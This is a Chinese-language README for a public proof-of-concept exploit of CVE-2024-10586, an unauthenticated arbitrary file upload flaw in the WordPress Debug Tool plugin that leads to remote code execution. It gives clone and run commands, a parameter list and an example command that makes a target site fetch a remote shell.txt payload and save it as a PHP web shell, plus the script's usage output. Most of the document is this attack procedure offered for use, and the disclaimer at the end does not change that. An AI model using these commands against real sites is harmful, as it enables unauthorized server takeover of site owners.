WordPress的Debug Tool插件在所有版本直至2.2中存在一个漏洞,由于dbt_pull_image()函数缺少权限检查以及文件类型验证缺失,导致未经身份验证的攻击者可以创建任意文件(如.php文件),进而实现远程代码执行。
CVE-2024-10586
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
2. 使用以下命令运行脚本:
python CVE-2024-10586.py -u <WordPress URL> -r <Remote File URL> -p <Optional Shell Path>
## 参数
- -u, --url: WordPress站点的基础URL(例如 http://example.com/wordpress)。
- -r, --remote: 用作载荷源的远程文件URL。
- -p, --path: 可选。Shell保存的路径。默认值为/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php。
### 示例命令
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
### 示例用法
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]
Send a POST request to WordPress admin-ajax.php.
options: -h, --help show this help message and exit -u URL, --url URL The base URL of the WordPress site. -r REMOTE, --remote REMOTE The remote URL to use in the 'source' parameter. -p PATH, --path PATH The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.
### 免责声明
此脚本仅供教育目的使用。请负责任地使用,仅在你拥有或获得明确测试许可的系统上运行。作者不对任何滥用或由此工具造成的损害负责。